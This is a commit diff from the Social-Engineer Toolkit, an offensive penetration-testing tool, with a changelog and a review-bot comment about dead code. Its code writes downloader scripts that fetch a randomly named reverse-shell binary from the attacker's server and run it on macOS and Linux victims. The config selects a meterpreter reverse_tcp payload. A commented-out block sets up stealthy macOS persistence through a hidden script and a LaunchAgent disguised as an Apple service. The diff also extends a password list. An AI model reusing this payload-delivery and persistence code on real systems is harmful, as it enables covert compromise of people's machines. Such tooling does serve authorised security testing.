mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-12-11 21:42:35 +00:00
SET version 5.3.3 release - many bug fixes
parent
85c889d311
commit
74ee6a6fa4
4 changed files with 80 additions and 6 deletions
|
@ -247,6 +247,10 @@ LINUX_PAYLOAD_DELIVERY=linux/x86/meterpreter/reverse_tcp
|
||||||
### DO YOU WANT TO USE A CUSTOM OSX AND LINUX PAYLOAD
|
### DO YOU WANT TO USE A CUSTOM OSX AND LINUX PAYLOAD
|
||||||
CUSTOM_LINUX_OSX_PAYLOAD=OFF
|
CUSTOM_LINUX_OSX_PAYLOAD=OFF
|
||||||
#
|
#
|
||||||
|
#
|
||||||
|
### THIS WILL USE A CUSTOM PLIST FOR PERSISTENCE ON OSX
|
||||||
|
ENABLE_PERSISTENCE_OSX=OFF
|
||||||
|
#
|
||||||
### User agent string for when using anything that clones the website, this user agent will be used
|
### User agent string for when using anything that clones the website, this user agent will be used
|
||||||
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
|
USER_AGENT_STRING=Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
|
||||||
#
|
#
|
||||||
|
|
|
@ -1,3 +1,11 @@
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
version 5.3.3
|
||||||
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
||||||
|
* fixed an issue that would cause the download to randomized name to work properly on OSX
|
||||||
|
* fixed an issue that was preventing setoolkit from properly executing on root and moved to /tmp
|
||||||
|
* added better stability for osx exploitation
|
||||||
|
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
version 5.3.2
|
version 5.3.2
|
||||||
~~~~~~~~~~~~~~~~
|
~~~~~~~~~~~~~~~~
|
||||||
|
|
|
@ -1,9 +1,7 @@
|
||||||
#!/usr/bin/python
|
#!/usr/bin/python
|
||||||
############################################
|
############################################
|
||||||
#
|
|
||||||
# Code behind the SET interactive shell
|
# Code behind the SET interactive shell
|
||||||
# and RATTE
|
# and RATTE
|
||||||
#
|
|
||||||
############################################
|
############################################
|
||||||
import os
|
import os
|
||||||
import sys
|
import sys
|
||||||
|
@ -168,17 +166,78 @@ if posix == True:
|
||||||
payload_flags = webserver.split(" ")
|
payload_flags = webserver.split(" ")
|
||||||
# grab osx binary name
|
# grab osx binary name
|
||||||
osx_name = generate_random_string(10,10)
|
osx_name = generate_random_string(10,10)
|
||||||
downloader = "#!/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
|
downloader = "#!/bin/sh\ncurl -C -O http://%s/%s > /tmp/%s\nchmod +x /tmp/%s\n./tmp/%s %s %s &" % (payload_flags[1],osx_name,osx_name,osx_name,osx_name,payload_flags[1],payload_flags[2])
|
||||||
filewrite.write(downloader)
|
filewrite.write(downloader + "\n")
|
||||||
|
persistence = check_config("ENABLE_PERSISTENCE_OSX=").lower()
|
||||||
|
if persistence == "on":
|
||||||
|
print "Coming soon.."
|
||||||
|
# modified persistence osx from http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
|
||||||
|
#filewrite.write(r"mkdir ~/Library/.hidden")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("cp /tmp/%s ~/Library/.hidden" % (osx_name))
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '#!/bin/bash' > ~/Library/.hidden/connect.sh")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("echo './%s %s %s &' >> ~/Library/.hidden/connect.sh" % (osx_name, payload_flags[1], payload_flags[2]))
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo 'chmod +x ~/Library/.hidden/connect.sh' >> ~/Library/.hidden/connect.sh")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"mkdir ~/Library/LaunchAgents")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("echo '<plist version=\"1.0\">' > ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>Label</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<string>com.apples.services</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>ProgramArguments</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<string>/bin/sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write("echo '<string>'$HOME'/Library/.hidden/connect.sh</string>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '</array>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>RunAtLoad</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>StartInterval</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<integer>60</integer>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<key>AbandonProcessGroup</key>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '<true/>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '</dict>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"echo '</plist>' >> ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"chmod 600 ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
#filewrite.write("\n")
|
||||||
|
#filewrite.write(r"launchctl load ~/Library/LaunchAgents/com.apples.services.plist")
|
||||||
|
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
# grab nix binary name
|
# grab nix binary name
|
||||||
|
#linux_name = check_options("NIX.BIN=")
|
||||||
linux_name = generate_random_string(10,10)
|
linux_name = generate_random_string(10,10)
|
||||||
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
|
downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % (payload_flags[1],linux_name,linux_name,linux_name,payload_flags[1],payload_flags[2])
|
||||||
filewrite = file(setdir + "/web_clone/nix.bin", "w")
|
filewrite = file(setdir + "/web_clone/nix.bin", "w")
|
||||||
filewrite.write(downloader)
|
filewrite.write(downloader)
|
||||||
filewrite.close()
|
filewrite.close()
|
||||||
shutil.copyfile("src/payloads/set_payloads/shell.osx", setdir + "/web_clone/%s" % (osx_name))
|
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", setdir + "/web_clone/%s" % (osx_name))
|
||||||
shutil.copyfile("src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
|
shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", setdir + "/web_clone/%s" % (linux_name))
|
||||||
|
|
||||||
|
# copy over the downloader scripts
|
||||||
|
osx_down = check_options("MAC.BIN=")
|
||||||
|
lin_down = check_options("NIX.BIN=")
|
||||||
|
shutil.copyfile(setdir + "/web_clone/nix.bin", setdir + "/web_clone/%s" % (lin_down))
|
||||||
|
shutil.copyfile(setdir + "/web_clone/mac.bin", setdir + "/web_clone/%s" % (osx_down))
|
||||||
|
|
||||||
# check to see if we are using a staged approach or direct shell
|
# check to see if we are using a staged approach or direct shell
|
||||||
stager = check_config("SET_SHELL_STAGER=").lower()
|
stager = check_config("SET_SHELL_STAGER=").lower()
|
||||||
|
|
|
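Review bot: The new `if persistence == "on":` branch only prints `Coming soon..`, and what follows it is about fifty commented-out `filewrite.write(...)` lines, so the `ENABLE_PERSISTENCE_OSX` option this commit adds to the config is described as functional but has no effect. Commented-out code of this size is better kept on a branch until it is implemented and tested. I would drop the commented block from this release and make the config comment say so, e.g. `### RESERVED: OSX PERSISTENCE IS NOT IMPLEMENTED YET, THIS FLAG HAS NO EFFECT`. The hunk also leaves `#linux_name = check_options("NIX.BIN=")` behind as a dead line. The enclosing `if posix == True:` block starts and ends outside the hunk.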
@ -1,3 +1,6 @@
|
||||||
|
default
|
||||||
|
test
|
||||||
|
testing
|
||||||
password2
|
password2
|
||||||
|
|
||||||
password
|
password
|
||||||
|
|